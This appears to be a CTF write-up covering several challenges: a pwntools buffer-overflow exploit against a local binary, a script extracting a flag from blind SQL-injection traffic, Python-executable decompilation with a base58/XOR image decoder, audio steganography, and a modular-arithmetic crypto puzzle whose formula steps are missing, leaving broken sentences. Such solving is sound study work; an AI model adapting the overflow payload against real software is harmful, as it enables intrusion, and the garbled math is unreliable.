from pwn import *
p = process('./magicc')
elf = ELF("./magicc")
f_addr = elf.symbols["hgdjskhrtdiu"]
p.recvuntil('Slytherin\n')
p.sendline(b'4')
p.recvuntil('success\n')
p.sendline(b'a'*(0x12+0x4)+p32(f_addr))
p.interactive()
PY
A challenge a friend dug up from who knows where; giving it a quick go
MISC-injection
Blind-injection traffic: filter it once through a pipe, once more with a regex, and done
tshark -r injection.pcap | grep "whoami" > injec.txt
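import re
from itertools import groupby
with open('injec.txt',encoding='utf-8') as f:
    data=f.read()
# each request tests one character position of whoami against a guess: capture (position, guessed character)
a=re.findall(r"whoami\),(.*?),1\)\)=ascii\('(.*?)'\),SLEEP",data)
# for every position keep the last guess that appears in the capture
flag="".join([list(g)[-1][-1] for k,g in groupby(a,key=lambda x:x[0])])
print(flag.replace("%7B","{").replace("%7D","}"))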
RE-冰冰给我flag可以吗 (Bingbing, can you give me the flag?)
First extract the exe with pyinstxtractor
python pyinstxtractor.py pypy.exe
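Then decompile the pyc with uncompyle6, and that's it
*Perhaps because the Python versions differ... the magic head of struct.pyc has to replace the magic head of pypy.pyc before it will decompile; put simply, replace everything before the E3 value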
uncompyle6 -o pypy.py pypy.pyc
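The header swap described in the note above, as an added example (not the author's code): it copies everything before the module code object from a reference pyc onto the extracted one, and skips an E3 byte that only happens to occur inside the header. The byte strings are constructed samples, the function names are hypothetical, and the Python 3.4+ marshal layout is assumed.

```python
MARK = 0xE3        # marshal TYPE_CODE (0x63) with FLAG_REF (0x80), as written by Python 3.4+
MAX_HEADER = 16    # pyc headers are 8, 12 or 16 bytes depending on the Python version

def code_start(data):
    """Offset of the module code object: an 0xE3 byte followed by two zero 32-bit fields.

    Assumption of this example: a module-level code object takes no arguments, so the
    first two counters after the type byte are zero. This skips an 0xE3 that merely
    happens to occur inside the header's timestamp or hash field.
    """
    for i in range(MAX_HEADER + 1):
        if data[i:i + 1] == bytes([MARK]) and data[i + 1:i + 9] == b"\x00" * 8:
            return i
    raise ValueError("no module code object found in the first bytes of the file")

def transplant_header(target, reference):
    """Return target with everything before its code object replaced by reference's header."""
    ref_off = code_start(reference)
    if ref_off not in (8, 12, 16):
        raise ValueError("unexpected header length in reference: %d" % ref_off)
    return reference[:ref_off] + target[code_start(target):]

# Constructed samples. The reference header contains a stray 0xE3 in its third field,
# which a plain search for the first E3 would mistake for the start of the code.
REFERENCE = (bytes.fromhex("550d0d0a" "00000000" "e3112233" "10000000")
             + b"\xe3" + b"\x00" * 8 + b"<struct code>")
TARGET_NO_HEADER = b"\xe3" + b"\x00" * 8 + b"<pypy code>"
TARGET_BAD_HEADER = b"\x00" * 12 + TARGET_NO_HEADER

if __name__ == "__main__":
    # On real files: read struct.pyc and pypy.pyc as bytes, write the result back to pypy.pyc.
    print(REFERENCE.find(b"\xe3"), code_start(REFERENCE))
    print(transplant_header(TARGET_BAD_HEADER, REFERENCE).hex())
```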
##import base58
##
##def enc(stream, file):
## text = base58.b58encode(stream)
## temp = list(bytes.decode(text))
## return temp
##
##if __name__ == '__main__':
## fp = open('冰冰给我flag可以吗.png', 'rb')
## context = fp.read()
## key = context[0]
## fp.close()
## fp = open('冰冰给我flag可以吗.png', 'wb')
## tmp = enc(context, fp)
## for i in range(len(tmp)):
## tmp[i] = chr(ord(tmp[i]) ^ key)
##
## fp.write(bytes(''.join(tmp), 'utf-8', **('encoding',)))
## fp.close()
import base58
with open('1.png','rb')as f:
    data=f.read()
# key = first byte of the original PNG, 0x89 = 137
a = "".join([chr(ord(i) ^ 137) for i in bytes.decode(data,'utf-8')])
a = base58.b58decode(a)
with open('2.png','wb')as f:
    f.write(a)
so deep
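Open the vhd file with 7zip and extract it to get a wav file and an archive
Given the challenge name, the point is presumably wav steganography with DeepSound. Download the software and open the wav file to get passwd.txt, the extraction password for chall.zip; extracting yields flag.zip and level2.mrf.
A Bing search (...) shows that this is a Macro Recorder file (the official site won't open, lol). Download and install the software; together with bandizip's encrypted-archive dialog (the password has to be confirmed, so it is typed twice), this yields the password for flag.zip; extract it to get the flag.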
WDC
CRYPTO-sample math
from Crypto.Util.number import getPrime
import hashlib
e = 2022
m = getPrime(512)
m1 = getPrime(512)
m2 = getPrime(512)
flag = m + m1 + m2
flag = hashlib.md5(str(flag).encode('utf-8')).hexdigest()
c1 = pow(m+m1,e,m*m1)
c2 = pow(m+m2,e,m*m2)
c3 = pow(m1+m2,e,m1*m2)
x = pow(m1+2022,m,m*m1)
y = pow(m2+2022,m,m*m2)
z = pow(m+2022,m1,m*m1)
print('c1 =',c1)
print('c2 =',c2)
print('c3 =',c3)
print('x =',x)
print('y =',y)
print('z =',z)
'''
c1 = 85139434329272123519094184286276070319638471046264384499440682030525456122476228324462769126167628121006213531153927884870307999106015430909361792093581895091445829379547633304737916675926004298753674268141399550405934376072486086468186907326396270307581239055199288888816051281495009808259009684332333344687
c2 = 104554808380721645840032269336579549039995977113982697194651690041676187039363703190743891658905715473980017457465221488358016284891528960913854895940235089108270134689312161783470000803482494370322574472422461483052403826282470850666418693908817591349159407595131136843764544166774390400827241213500917391144
c3 = 94771625845449128812081345291218973301979152577131568497740476123729158619324753128517222692750900524689049078606978317742545997482763600884362992468406577524708622046033409713416026145377740182233674890063333534646927601262333672233695863286637817471270314093720827409474178917969326556939942622112511819330
x = 78237329408351955465927092805995076909826011029371783256454322166600398149132623484679723362562600068961760410039241554232588011577854168402399895992331761353772415982560522912511879304977362225597552446397868843275129027248765252784503841114291392822052506837132093960290237335686354012448414804030938873765
y = 100442166633632319633494450595418167608036668647704883492068692098914206322465717138894302011092841820156560129280901426898815274744523998613724326647935591857728931946261379997352809249780159136988674034759483947949779535134522005905257436546335376141008113285692888482442131971935583298243412131571769294029
z = 104712661985900115750011628727270934552698948001634201257337487373976943443738367683435788889160488319624447315127992641805597631347763038111352925925686965948545739394656951753648392926627442105629724634607023721715249914976189181389720790879720452348480924301370569461741945968322303130995996793764440204452
'''
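1. Given
2. By the polynomial expansion formula
then
From , we get
3. From , we get
By Fermat's little theorem (when a is not a multiple of p and p is prime, , i.e. ), we get
4.
Similarly, ; taking the gcd gives m
5. From , we get
Similarly, (since m2 is a 512-bit prime, does not meet the condition, so m has to be added)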